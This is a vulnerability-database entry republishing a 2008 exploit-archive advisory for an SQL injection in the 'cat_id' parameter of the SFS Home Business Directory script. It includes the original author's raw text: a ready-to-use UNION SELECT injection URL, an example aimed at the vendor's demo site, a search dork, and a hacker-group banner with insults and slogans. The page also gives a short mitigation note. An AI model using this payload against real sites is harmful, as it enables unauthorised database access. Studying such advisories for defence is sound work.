SFS Home Business Directory SQL Injection Vuln.

vendor:

SFS Home Business Directory

by:

BeyazKurt

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: SFS Home Business Directory

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

SFS Home Business Directory SQL Injection Vuln.

The vulnerability exists due to insufficient filtration of user-supplied data passed via the 'cat_id' parameter to '/directory.php' script. A remote attacker can execute arbitrary SQL commands in application's database, cause denial of service, access or modify sensitive data, exploit latent vulnerabilities in the underlying database and compromise the system.

Mitigation:

Input validation should be used to prevent SQL injection attacks. The application should sanitize all user-supplied data before using it in SQL queries.

Source

Exploit-DB raw data:

#######################################################
# Author : BeyazKurt
# Contact : BeyazKurt@BSDMail.Com
# Site : www.khg-crew.ws - KOSOVA HACKERS GROUP
# LAHEY mahkemesini kiniyoruz. FUCK THE JUSTICE!
#
# Script : SFS Home Business Directory
# Price: $ 24.95
# Script Site: http://scripts-for-sites.com/item.php?item=113
#
# D0rk : "sie go. amk iÅŸinizmi yok xD"
#
# SQL Injection Vuln. :
#
# Exploit : SITE.COM/[path]/directory.php?ax=list&sub=1&cat_id=1+union+select+0,1,version(),database()/*
#
# Example: http://homebiz.scripts-for-sites.com/directory.php?ax=list&sub=1&cat_id=1+union+select+0,1,version(),database()/*
#
# -------------------------------
#                       Ya RAMADHAN
#              INDEPENDENT KOSOVA (H) - Etnic ALBANIA (H)
#  pigs for dedication : WE Are Don't Forget Kosova, Drenica, Srebrenica And All Genocide !!
#                      Proud 2 Be ALBANIAN !
#
# bÃ¼tÃ¼n emocu,punkci zartci zurtcularin Aq!  Anti-Tikky.Com anti-tikiyiz xD
#
# ONEMLI Not Expo Bilisimden host almayin. Serefsizler daha sunucu yonetmeyi bilmiyor bide ustune musteriyi keklemeye calisiyo. Yakinda kanitlariyla r10da yayinlicam ;)
# Demistim rezil edicem sizi ;)
#
#######################################################

# milw0rm.com [2008-10-31]